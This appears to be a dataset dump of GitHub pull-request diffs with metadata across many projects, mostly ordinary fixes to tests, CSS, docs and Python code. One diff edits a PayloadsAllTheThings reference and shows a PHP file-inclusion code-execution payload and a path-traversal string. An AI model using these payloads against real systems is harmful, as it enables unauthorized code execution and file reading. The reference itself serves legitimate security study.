diff --git a/tests/keras/engine/test_training.py b/tests/keras/engine/test_training.py
index a17187f5a31..f0986978421 100644
--- a/tests/keras/engine/test_training.py
+++ b/tests/keras/engine/test_training.py
@@ -4,10 +4,10 @@
import sys
import scipy.sparse as sparse
+import keras
from keras.layers import Dense, Dropout
from keras.engine.topology import Input
from keras.engine.training import Model
-from keras.engine.training import Model
from keras.engine.training import _check_loss_and_target_compatibility
from keras.engine.training import _weighted_masked_objective
from keras.engine.training import _check_array_lengths
@@ -673,7 +673,7 @@ def test_model_with_partial_loss():
@keras_test
@pytest.mark.skipif((K.backend() == 'cntk'),
- reason="cntk does not support external loss yet")
+ reason='cntk does not support external loss yet')
def test_model_with_external_loss():
# None loss, only regularization loss.
a = Input(shape=(3,), name='input_a')
@@ -749,5 +749,64 @@ def test_model_with_external_loss():
assert out.shape == (10, 4)
+@keras_test
+def test_target_tensors():
+ # single-output, as list
+ model = keras.models.Sequential()
+ model.add(keras.layers.Dense(4, input_shape=(4,), name='dense'))
+ input_val = np.random.random((10, 4))
+ target_val = np.random.random((10, 4))
+ target = keras.backend.variable(target_val)
+ model.compile(optimizer='rmsprop', loss='mse', target_tensors=[target])
+ model.train_on_batch(input_val, None)
+
+ # single-output, as dict
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense': target})
+ model.train_on_batch(input_val, None)
+
+ # test invalid arguments
+ with pytest.raises(TypeError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=set())
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target, target])
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense2': None})
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target])
+ model.train_on_batch(input_val, target_val)
+
+ # multi-output, as list
+ input_val = np.random.random((10, 4))
+ target_val_a = np.random.random((10, 4))
+ target_val_b = np.random.random((10, 4))
+ target_a = keras.backend.variable(target_val_a)
+ target_b = keras.backend.variable(target_val_b)
+
+ inputs = keras.layers.Input(shape=(4,))
+ output_a = keras.layers.Dense(4, name='dense_a')(inputs)
+ output_b = keras.layers.Dense(4, name='dense_b')(inputs)
+ model = keras.models.Model(inputs, [output_a, output_b])
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target_a, target_b])
+ model.train_on_batch(input_val, None)
+
+ # multi-output, as dict
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense_a': target_a,
+ 'dense_b': target_b})
+ model.train_on_batch(input_val, None)
+
+ # test with sample weights
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target_a, target_b])
+ model.train_on_batch(input_val, None,
+ sample_weight={'dense_a': np.random.random((10,))})
+
+
if __name__ == '__main__':
pytest.main([__file__])
| https://api.github.com/repos/keras-team/keras/pulls/7645 | 2017-08-14T23:44:25Z | 2017-08-15T00:52:54Z | 2017-08-15T00:52:54Z | 2017-08-15T00:53:04Z | 2,813 | keras-team/keras | 47,800 |
|
Update README.md | diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index e0cccdf9e6..2d1c2d95b0 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -186,7 +186,7 @@ Specify your payload in the POST parameters
```powershell
http://example.com/index.php?page=php://input
-POST DATA: <? system('id'); ?>
+POST DATA: <?php system('id'); ?>
```
### Wrapper phar://
@@ -340,4 +340,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
-* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
\ No newline at end of file
+* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
| https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/30 | 2018-11-19T11:45:38Z | 2018-11-19T13:01:45Z | 2018-11-19T13:01:45Z | 2018-11-19T13:01:45Z | 385 | swisskyrepo/PayloadsAllTheThings | 8,442 |
|
Respect response to CONNECT created in http_connect function in upstream mode | diff --git a/mitmproxy/proxy/protocol/http.py b/mitmproxy/proxy/protocol/http.py
index 502280c140..a366861d7a 100644
--- a/mitmproxy/proxy/protocol/http.py
+++ b/mitmproxy/proxy/protocol/http.py
@@ -217,16 +217,19 @@ def handle_regular_connect(self, f):
return False
def handle_upstream_connect(self, f):
- self.establish_server_connection(
- f.request.host,
- f.request.port,
- f.request.scheme
- )
- self.send_request(f.request)
- f.response = self.read_response_headers()
- f.response.data.content = b"".join(
- self.read_response_body(f.request, f.response)
- )
+ # if the user specifies a response in the http_connect hook, we do not connect upstream here.
+ # https://github.com/mitmproxy/mitmproxy/pull/2473
+ if not f.response:
+ self.establish_server_connection(
+ f.request.host,
+ f.request.port,
+ f.request.scheme
+ )
+ self.send_request(f.request)
+ f.response = self.read_response_headers()
+ f.response.data.content = b"".join(
+ self.read_response_body(f.request, f.response)
+ )
self.send_response(f.response)
if is_ok(f.response.status_code):
layer = UpstreamConnectLayer(self, f.request)
| Example script that creates response to CONNECT:
```
from mitmproxy.http import make_connect_response
def http_connect(flow):
if flow.request.method == 'CONNECT':
# You may also selectively deny CONNECT request from certain IPs here.
flow.response = make_connect_response(flow.request.http_version)
```
Fixes #2464 | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/2473 | 2017-07-26T10:20:36Z | 2017-07-26T10:57:21Z | 2017-07-26T10:57:21Z | 2017-07-27T02:02:22Z | 320 | mitmproxy/mitmproxy | 28,334 |
Instruct style improvements | diff --git a/README.md b/README.md
index d35ebe04aa..4b65254d83 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ Its goal is to become the [AUTOMATIC1111/stable-diffusion-webui](https://github.
* Dropdown menu for quickly switching between different models.
* Large number of extensions (built-in and user-contributed), including Coqui TTS for realistic voice outputs, Whisper STT for voice inputs, translation, [multimodal pipelines](https://github.com/oobabooga/text-generation-webui/tree/main/extensions/multimodal), vector databases, Stable Diffusion integration, and a lot more. See [the wiki](https://github.com/oobabooga/text-generation-webui/wiki/07-%E2%80%90-Extensions) and [the extensions directory](https://github.com/oobabooga/text-generation-webui-extensions) for details.
* [Chat with custom characters](https://github.com/oobabooga/text-generation-webui/wiki/03-%E2%80%90-Parameters-Tab#character).
-* Precise chat templates for instruction-following models, including Llama-2-chat, Alpaca, Vicuna, Mistral, and many others.
+* Precise chat templates for instruction-following models, including Llama-2-chat, Alpaca, Vicuna, Mistral.
* LoRA: train new LoRAs with your own data, load/unload LoRAs on the fly for generation.
* Transformers library integration: load models in 4-bit or 8-bit precision through bitsandbytes, use llama.cpp with transformers samplers (`llamacpp_HF` loader), CPU inference in 32-bit precision using PyTorch.
* OpenAI-compatible API server with Chat and Completions endpoints -- see the [examples](https://github.com/oobabooga/text-generation-webui/wiki/12-%E2%80%90-OpenAI-API#examples).
diff --git a/css/html_instruct_style.css b/css/html_instruct_style.css
index 1908f879f7..acff04f196 100644
--- a/css/html_instruct_style.css
+++ b/css/html_instruct_style.css
@@ -1,10 +1,18 @@
+.chat {
+ background: var(--block-background-fill);
+ padding: 24px 19px;
+ padding-right: 19px !important;
+ border: 1px solid var(--block-border-color);
+ border-radius: 8px;
+}
+
.message {
display: grid;
grid-template-columns: 60px 1fr;
padding-bottom: 25px;
font-size: 15px;
font-family: 'Noto Sans', Helvetica, Arial, sans-serif;
- line-height: 22px;
+ line-height: 24px;
}
.username {
@@ -13,11 +21,16 @@
.message-body p, .message-body li {
font-size: 15px !important;
- line-height: 22.5px !important;
+ line-height: 24px !important;
+ list-style-position: outside;
}
.message-body p, .chat .message-body ul, .chat .message-body ol {
- margin-bottom: 23.4375px !important;
+ margin-bottom: 16px !important;
+}
+
+.chat .message-body ul, .chat .message-body ol {
+ padding-inline-start: 2em;
}
.message-body p:last-child, .chat .message-body ul:last-child, .chat .message-body ol:last-child {
@@ -34,34 +47,34 @@
.gradio-container .chat .assistant-message {
padding: 20px;
- border-radius: 20px;
- background-color: #0000000f;
- margin-top: 9px !important;
- margin-bottom: 18px !important;
+ background: var(--background-fill-secondary);
+ margin-top: 12px !important;
+ margin-bottom: 24px !important;
+ margin-right: 16px;
+ border-radius: 22px;
+ border-bottom-left-radius: 0;
+ border: 1px solid var(--border-color-primary);
}
.gradio-container .chat .user-message {
padding: 20px;
+ background-color: var(--color-accent-soft);
border-radius: 20px;
- margin-bottom: 9px !important;
+ margin-bottom: 12px !important;
+ margin-left: 16px;
+ border-radius: 22px;
+ border-bottom-right-radius: 0;
+ border: 1px solid var(--border-color-accent-subdued);
}
.gradio-container .chat .assistant-message:last-child, .gradio-container .chat .user-message:last-child {
margin-bottom: 0 !important;
}
-.dark .chat .assistant-message {
- background-color: #1f2937;
-}
-
-.dark .chat .user-message {
- background-color: transparent;
-}
-
code {
- background-color: white !important;
+ background-color: #f3f4f6 !important;
}
.dark code {
- background-color: #0e1321 !important;
+ background-color: #1f2937 !important;
}
\ No newline at end of file
diff --git a/css/main.css b/css/main.css
index a3480fe034..a53f99d025 100644
--- a/css/main.css
+++ b/css/main.css
@@ -332,7 +332,7 @@ div.svelte-362y77>*, div.svelte-362y77>.form>* {
margin-left: auto;
margin-right: auto;
max-width: 880px;
- height: 100%;
+ min-height: var(--chat-height);
overflow-y: auto;
padding-right: 15px;
display: flex;
diff --git a/js/main.js b/js/main.js
index 1e50e14742..5c05b394c8 100644
--- a/js/main.js
+++ b/js/main.js
@@ -123,6 +123,8 @@ targetElement.addEventListener("scroll", function() {
// Create a MutationObserver instance
const observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
+ updateChatHeight();
+
if(!isScrolled) {
targetElement.scrollTop = targetElement.scrollHeight;
}
@@ -373,3 +375,15 @@ function toggleBigPicture() {
}
}
+//------------------------------------------------
+// Define the --chat-height global CSS variable to
+// the height of the chat parent
+//------------------------------------------------
+function updateChatHeight() {
+ const chatContainer = document.getElementById('chat').parentNode.parentNode.parentNode;
+ const newChatHeight = `${chatContainer.clientHeight}px`;
+
+ document.documentElement.style.setProperty('--chat-height', newChatHeight);
+}
+
+window.addEventListener('resize', updateChatHeight);
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/4951 | 2023-12-16T21:57:16Z | 2023-12-17T01:16:27Z | 2023-12-17T01:16:27Z | 2023-12-17T03:40:22Z | 1,540 | oobabooga/text-generation-webui | 26,456 |
|
asyncio: fix exit behaviour for console | diff --git a/mitmproxy/master.py b/mitmproxy/master.py
index 19a2ac6724..bbbd07d0e7 100644
--- a/mitmproxy/master.py
+++ b/mitmproxy/master.py
@@ -1,3 +1,5 @@
+import sys
+import traceback
import threading
import asyncio
import logging
@@ -85,18 +87,40 @@ async def tick(self):
self.addons.trigger("tick")
await asyncio.sleep(0.1)
- def run(self):
+ def run_loop(self, loop):
self.start()
asyncio.ensure_future(self.tick())
- loop = asyncio.get_event_loop()
+
+ exc = None
try:
- loop.run_forever()
+ loop()
+ except Exception as e:
+ exc = traceback.format_exc()
finally:
+ if not self.should_exit.is_set():
+ self.shutdown()
pending = asyncio.Task.all_tasks()
- loop.run_until_complete(asyncio.gather(*pending))
+ loop = asyncio.get_event_loop()
+ try:
+ loop.run_until_complete(asyncio.gather(*pending))
+ except Exception as e:
+ # When we exit with an error, shutdown might not happen cleanly,
+ # and we can get exceptions here caused by pending Futures.
+ pass
loop.close()
+
+ if exc: # pragma: no cover
+ print(exc, file=sys.stderr)
+ print("mitmproxy has crashed!", file=sys.stderr)
+ print("Please lodge a bug report at:", file=sys.stderr)
+ print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
+
self.addons.trigger("done")
+ def run(self, func=None):
+ loop = asyncio.get_event_loop()
+ self.run_loop(loop.run_forever)
+
async def _shutdown(self):
if self.server:
self.server.shutdown()
diff --git a/mitmproxy/tools/console/master.py b/mitmproxy/tools/console/master.py
index c66129b21e..9ed73ce93b 100644
--- a/mitmproxy/tools/console/master.py
+++ b/mitmproxy/tools/console/master.py
@@ -9,7 +9,6 @@
import subprocess
import sys
import tempfile
-import traceback
import typing # noqa
import contextlib
@@ -205,7 +204,6 @@ def run(self):
screen = self.ui,
handle_mouse = self.options.console_mouse,
)
-
self.window = window.Window(self)
self.loop.widget = self.window
self.window.refresh()
@@ -216,24 +214,7 @@ def display_err(*_):
self.start_err = None
self.loop.set_alarm_in(0.01, display_err)
- self.start()
- try:
- self.loop.run()
- except Exception:
- self.loop.stop()
- sys.stdout.flush()
- print(traceback.format_exc(), file=sys.stderr)
- print("mitmproxy has crashed!", file=sys.stderr)
- print("Please lodge a bug report at:", file=sys.stderr)
- print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
- print("Shutting down...", file=sys.stderr)
- finally:
- sys.stderr.flush()
- super().shutdown()
- self.addons.trigger("done")
-
- def shutdown(self):
- raise urwid.ExitMainLoop
+ super().run_loop(self.loop.run)
def overlay(self, widget, **kwargs):
self.window.set_overlay(widget, **kwargs)
| - Add a master.run_loop function. This encapsulates our run behaviour so that
it can be used by implementations that need to manage their own run loop (like urwid).
- Shift crash exit message to the common core. I'm not convinced we really need
this, but if we want it it should be centralised.
- Clean up an extra exception that can be thrown by asyncio itself on "dirty"
termination after a mitmproxy crash. | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3064 | 2018-04-16T22:23:38Z | 2018-04-17T19:58:52Z | 2018-04-17T19:58:52Z | 2018-05-15T21:48:47Z | 781 | mitmproxy/mitmproxy | 28,237 |
Added minimum waiting time problem solution using greedy algorithm | diff --git a/DIRECTORY.md b/DIRECTORY.md
index 681d252b232d..297fb9f5defa 100644
--- a/DIRECTORY.md
+++ b/DIRECTORY.md
@@ -449,6 +449,7 @@
* [Fractional Knapsack](greedy_methods/fractional_knapsack.py)
* [Fractional Knapsack 2](greedy_methods/fractional_knapsack_2.py)
* [Optimal Merge Pattern](greedy_methods/optimal_merge_pattern.py)
+ * [Minimum Waiting Time ](greedy_methods/minimum_waiting_time.py)
## Hashes
* [Adler32](hashes/adler32.py)
diff --git a/greedy_methods/minimum_waiting_time.py b/greedy_methods/minimum_waiting_time.py
new file mode 100644
index 000000000000..aaae8cf8f720
--- /dev/null
+++ b/greedy_methods/minimum_waiting_time.py
@@ -0,0 +1,48 @@
+"""
+Calculate the minimum waiting time using a greedy algorithm.
+reference: https://www.youtube.com/watch?v=Sf3eiO12eJs
+
+For doctests run following command:
+python -m doctest -v minimum_waiting_time.py
+
+The minimum_waiting_time function uses a greedy algorithm to calculate the minimum
+time for queries to complete. It sorts the list in non-decreasing order, calculates
+the waiting time for each query by multiplying its position in the list with the
+sum of all remaining query times, and returns the total waiting time. A doctest
+ensures that the function produces the correct output.
+"""
+
+
+def minimum_waiting_time(queries: list[int]) -> int:
+ """
+ This function takes a list of query times and returns the minimum waiting time
+ for all queries to be completed.
+
+ Args:
+ queries: A list of queries measured in picoseconds
+
+ Returns:
+ total_waiting_time: Minimum waiting time measured in picoseconds
+
+ Examples:
+ >>> minimum_waiting_time([3, 2, 1, 2, 6])
+ 17
+ >>> minimum_waiting_time([3, 2, 1])
+ 4
+ >>> minimum_waiting_time([1, 2, 3, 4])
+ 10
+ >>> minimum_waiting_time([5, 5, 5, 5])
+ 30
+ >>> minimum_waiting_time([])
+ 0
+ """
+ n = len(queries)
+ if n in (0, 1):
+ return 0
+ return sum(query * (n - i - 1) for i, query in enumerate(sorted(queries)))
+
+
+if __name__ == "__main__":
+ import doctest
+
+ doctest.testmod()
| ### Describe your change:
* [x] Add an algorithm?
* [ ] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### Checklist:
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [x] All new Python files are placed inside an existing directory.
* [x] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [x] All new algorithms include at least one URL that points to Wikipedia or another similar explanation.
* [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
| https://api.github.com/repos/TheAlgorithms/Python/pulls/8701 | 2023-04-29T17:27:34Z | 2023-05-01T10:23:04Z | 2023-05-01T10:23:03Z | 2023-05-01T10:23:04Z | 639 | TheAlgorithms/Python | 30,043 |
Correct "bug," typo to "bug", in README.md | diff --git a/README.md b/README.md
index 5de6bb99a..4d9b06bb9 100755
--- a/README.md
+++ b/README.md
@@ -104,7 +104,7 @@ In order to help developers address these risks, we have created the [Responsibl
## Issues
-Please report any software “bug,” or other problems with the models through one of the following means:
+Please report any software “bug”, or other problems with the models through one of the following means:
- Reporting issues with the model: [github.com/facebookresearch/llama](http://github.com/facebookresearch/llama)
- Reporting risky content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback)
- Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info)
| https://api.github.com/repos/meta-llama/llama/pulls/897 | 2023-11-02T17:47:25Z | 2023-11-02T17:53:24Z | 2023-11-02T17:53:24Z | 2023-11-02T17:53:24Z | 198 | meta-llama/llama | 31,949 |
|
#428: Don't fail when history is readonly | diff --git a/thefuck/shells.py b/thefuck/shells.py
index 170c2ae10..f78d25755 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -10,13 +10,14 @@
import io
import os
import shlex
+import sys
import six
from .utils import DEVNULL, memoize, cache
from .conf import settings
+from . import logs
class Generic(object):
-
def get_aliases(self):
return {}
@@ -69,8 +70,8 @@ def get_history(self):
lines = lines[-settings.history_limit:]
for line in lines:
- prepared = self._script_from_history(line)\
- .strip()
+ prepared = self._script_from_history(line) \
+ .strip()
if prepared:
yield prepared
@@ -117,9 +118,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['bash', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -139,7 +140,6 @@ def how_to_configure(self):
class Fish(Generic):
-
def _get_overridden_aliases(self):
overridden_aliases = os.environ.get('TF_OVERRIDDEN_ALIASES', '').strip()
if overridden_aliases:
@@ -219,9 +219,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['zsh', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -254,9 +254,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['tcsh', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '\t' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '\t' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -303,7 +303,10 @@ def thefuck_alias():
def put_to_history(command):
- return _get_shell().put_to_history(command)
+ try:
+ return _get_shell().put_to_history(command)
+ except IOError:
+ logs.exception("Can't update history", sys.exc_info())
def and_(*commands):
| https://api.github.com/repos/nvbn/thefuck/pulls/431 | 2016-01-13T19:01:22Z | 2016-01-13T19:03:31Z | 2016-01-13T19:03:31Z | 2016-01-13T19:12:53Z | 761 | nvbn/thefuck | 30,810 |
|
Fix github source links in docs | diff --git a/.github/workflows/build_documentation.yml b/.github/workflows/build_documentation.yml
index b7d1f895cd..167b7d610b 100644
--- a/.github/workflows/build_documentation.yml
+++ b/.github/workflows/build_documentation.yml
@@ -16,5 +16,6 @@ jobs:
package_name: timm
repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
+ version_tag_suffix: ""
secrets:
token: ${{ secrets.HUGGINGFACE_PUSH }}
\ No newline at end of file
| Adds `version_tag_suffix` to the main doc workflow (its already in the pr doc build workflow). Without it, github source links have a `src/` part in them that breaks them.
| https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1612 | 2023-01-04T17:35:57Z | 2023-01-04T17:42:05Z | 2023-01-04T17:42:05Z | 2023-01-04T17:44:50Z | 136 | huggingface/pytorch-image-models | 16,469 |
Add 3rd party certbot-dns-godaddy to the docs | diff --git a/certbot/docs/using.rst b/certbot/docs/using.rst
index cc061b62232..be4d96c4f79 100644
--- a/certbot/docs/using.rst
+++ b/certbot/docs/using.rst
@@ -285,6 +285,7 @@ dns-clouddns_ Y N DNS Authentication using CloudDNS API
dns-lightsail_ Y N DNS Authentication using Amazon Lightsail DNS API
dns-inwx_ Y Y DNS Authentication for INWX through the XML API
dns-azure_ Y N DNS Authentication using Azure DNS
+dns-godaddy_ Y N DNS Authentication using Godaddy DNS
================== ==== ==== ===============================================================
.. _haproxy: https://github.com/greenhost/certbot-haproxy
@@ -300,6 +301,7 @@ dns-azure_ Y N DNS Authentication using Azure DNS
.. _dns-lightsail: https://github.com/noi/certbot-dns-lightsail
.. _dns-inwx: https://github.com/oGGy990/certbot-dns-inwx/
.. _dns-azure: https://github.com/binkhq/certbot-dns-azure
+.. _dns-godaddy: https://github.com/miigotu/certbot-dns-godaddy
If you're interested, you can also :ref:`write your own plugin <dev-plugin>`.
| ## Pull Request Checklist
| https://api.github.com/repos/certbot/certbot/pulls/8844 | 2021-05-12T04:29:46Z | 2021-05-12T23:22:32Z | 2021-05-12T23:22:32Z | 2021-05-13T04:43:03Z | 326 | certbot/certbot | 1,774 |
Fix various bugs for LoRA training | diff --git a/modules/training.py b/modules/training.py
index b0e0240085..2830ba07ff 100644
--- a/modules/training.py
+++ b/modules/training.py
@@ -341,7 +341,7 @@ def do_train(lora_name: str, always_override: bool, q_proj_en: bool, v_proj_en:
# Populate target_modules list with chosen X_proj modules. Llama-based models only atm, non-llama will revert to default behavior.
def list_target_modules(model_id):
- if model_id != "llama":
+ if model_id != "llama" and model_id != "mistral":
return model_to_lora_modules[model_id]
available_modules = {
@@ -517,7 +517,8 @@ def generate_and_tokenize_prompt(data_point):
# == Start prepping the model itself ==
if not hasattr(shared.model, 'lm_head') or hasattr(shared.model.lm_head, 'weight'):
logger.info("Getting model ready")
- prepare_model_for_kbit_training(shared.model)
+ if 'quantization_config' in shared.model.config.to_dict():
+ prepare_model_for_kbit_training(shared.model)
# base model is now frozen and should not be reused for any other LoRA training than this one
shared.model_dirty_from_training = True
@@ -615,7 +616,8 @@ def on_log(self, args: transformers.TrainingArguments, state: transformers.Train
warmup_steps=math.ceil(warmup_steps / gradient_accumulation_steps),
num_train_epochs=epochs,
learning_rate=actual_lr,
- fp16=False if shared.args.cpu else True,
+ fp16=False if shared.args.cpu or shared.args.bf16 else True,
+ bf16=shared.args.bf16,
optim=optimizer,
logging_steps=2 if stop_at_loss > 0 else 5,
evaluation_strategy="steps" if eval_data is not None else "no",
@@ -627,7 +629,7 @@ def on_log(self, args: transformers.TrainingArguments, state: transformers.Train
# TODO: Enable multi-device support
ddp_find_unused_parameters=None,
no_cuda=shared.args.cpu,
- use_ipex=True if is_torch_xpu_available and not shared.args.cpu else False
+ use_ipex=True if is_torch_xpu_available() and not shared.args.cpu else False
),
data_collator=transformers.DataCollatorForLanguageModeling(shared.tokenizer, mlm=False),
callbacks=list([Callbacks()])
| - Allow mistral models to have all modules targeted selectively, since the module names are the same as those for llama models
- Fixed issue that occurred because prepare_model_for_kbit_training was being run on unquantized models that didn't need it (causing an OOM error)
- Fixed issue in the training arguments that didn't allow BF16 training to take place even when the appropriate options were selected in the model menu
- Fixed typo that erroneously (always) enabled IPEX
## Checklist:
- [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines).
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5161 | 2024-01-03T22:10:15Z | 2024-01-03T23:42:21Z | 2024-01-03T23:42:21Z | 2024-01-04T06:43:41Z | 552 | oobabooga/text-generation-webui | 26,414 |
Improve test structure (proposal) | diff --git a/test_requests.py b/tests/integration/test_requests.py
similarity index 100%
rename from test_requests.py
rename to tests/integration/test_requests.py
diff --git a/tests/unit/test_requests_api.py b/tests/unit/test_requests_api.py
new file mode 100755
index 0000000000..98591c3b64
--- /dev/null
+++ b/tests/unit/test_requests_api.py
@@ -0,0 +1,71 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import unittest
+import mock
+import sys
+import os
+sys.path.append(os.getcwd())
+
+try:
+ import omnijson as json
+except ImportError:
+ import json
+
+import requests
+from requests.models import Response
+
+class RequestsAPIUnitTests(unittest.TestCase):
+ """Requests API unit test cases."""
+
+ def setUp(self):
+ pass
+
+
+ def tearDown(self):
+ """Teardown."""
+ pass
+
+
+ @mock.patch('requests.api.request')
+ def test_http_get(self, mock_request):
+ mock_request.return_value = Response()
+ requests.get('http://google.com')
+ mock_request.assert_called_once_with('get', 'http://google.com',
+ allow_redirects= True)
+
+ @mock.patch('requests.api.request')
+ def test_http_head(self, mock_request):
+ mock_request.return_value = Response()
+ requests.head('http://google.com')
+ mock_request.assert_called_once_with('head', 'http://google.com',
+ allow_redirects= True)
+
+ @mock.patch('requests.api.request')
+ def test_http_post(self, mock_request):
+ mock_request.return_value = Response()
+ requests.post('http://google.com', {})
+ mock_request.assert_called_once_with('post', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_put(self, mock_request):
+ mock_request.return_value = Response()
+ requests.put('http://google.com', {})
+ mock_request.assert_called_once_with('put', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_patch(self, mock_request):
+ mock_request.return_value = Response()
+ requests.patch('http://google.com', {})
+ mock_request.assert_called_once_with('patch', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_delete(self, mock_request):
+ mock_request.return_value = Response()
+ requests.delete('http://google.com')
+ mock_request.assert_called_once_with('delete', 'http://google.com')
+
+if __name__ == '__main__':
+ unittest.main()
| This might be somewhat related to issue #153. I think it would make sense to split up testing into a unit testing and an integration testing part (loosely defined). In the unit tests the actual methods are tested with everything mocked out. This way it can be assured that the respective external methods are always called with the right arguments. In the integration testing suite it is allowed to call external entities (like `httpbin.org`) for testing the overall function. So I just moved the existing tests there.
I have restructured the tests organization a bit and added some basic unit tests for the `api` module. However I would like to get your feedback on this, before going on. As this will definitely be some work and take a while to reach a somewhat good level of coverage.
| https://api.github.com/repos/psf/requests/pulls/166 | 2011-09-15T22:44:14Z | 2011-09-16T02:30:33Z | 2011-09-16T02:30:33Z | 2021-09-08T12:01:25Z | 618 | psf/requests | 32,378 |
[MRG+1] FIX out of bounds array access in SAGA | diff --git a/sklearn/linear_model/sag_fast.pyx b/sklearn/linear_model/sag_fast.pyx
index 8c370db7e3b1e..592b0f497b4b1 100644
--- a/sklearn/linear_model/sag_fast.pyx
+++ b/sklearn/linear_model/sag_fast.pyx
@@ -614,10 +614,14 @@ cdef void lagged_update(double* weights, double wscale, int xnnz,
last_update_ind = sample_itr - 1
for lagged_ind in range(sample_itr - 1,
last_update_ind - 1, -1):
- grad_step = (cumulative_sums[lagged_ind]
- - cumulative_sums[lagged_ind - 1])
- prox_step = (cumulative_sums_prox[lagged_ind]
- - cumulative_sums_prox[lagged_ind - 1])
+ if lagged_ind > 0:
+ grad_step = (cumulative_sums[lagged_ind]
+ - cumulative_sums[lagged_ind - 1])
+ prox_step = (cumulative_sums_prox[lagged_ind]
+ - cumulative_sums_prox[lagged_ind - 1])
+ else:
+ grad_step = cumulative_sums[lagged_ind]
+ prox_step = cumulative_sums_prox[lagged_ind]
weights[idx] -= sum_gradient[idx] * grad_step
weights[idx] = _soft_thresholding(weights[idx],
prox_step)
| Fixes #9351 (random inconsistencies between SAGA and liblinear LogisticRegression on OS X).
To hedge my bets that this is the right fix, I'll ping @tomdlt, @arthurmensch, @dsullivan7. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/9376 | 2017-07-16T13:49:48Z | 2017-07-17T08:49:56Z | 2017-07-17T08:49:55Z | 2017-07-17T08:56:25Z | 342 | scikit-learn/scikit-learn | 46,577 |
Move our macOS tests to Azure Pipelines | diff --git a/.azure-pipelines/templates/tests-suite.yml b/.azure-pipelines/templates/tests-suite.yml
index 119f755a6fb..069ea94d62f 100644
--- a/.azure-pipelines/templates/tests-suite.yml
+++ b/.azure-pipelines/templates/tests-suite.yml
@@ -1,22 +1,36 @@
jobs:
- job: test
- pool:
- vmImage: vs2017-win2016
strategy:
matrix:
- py35:
+ macos-py27:
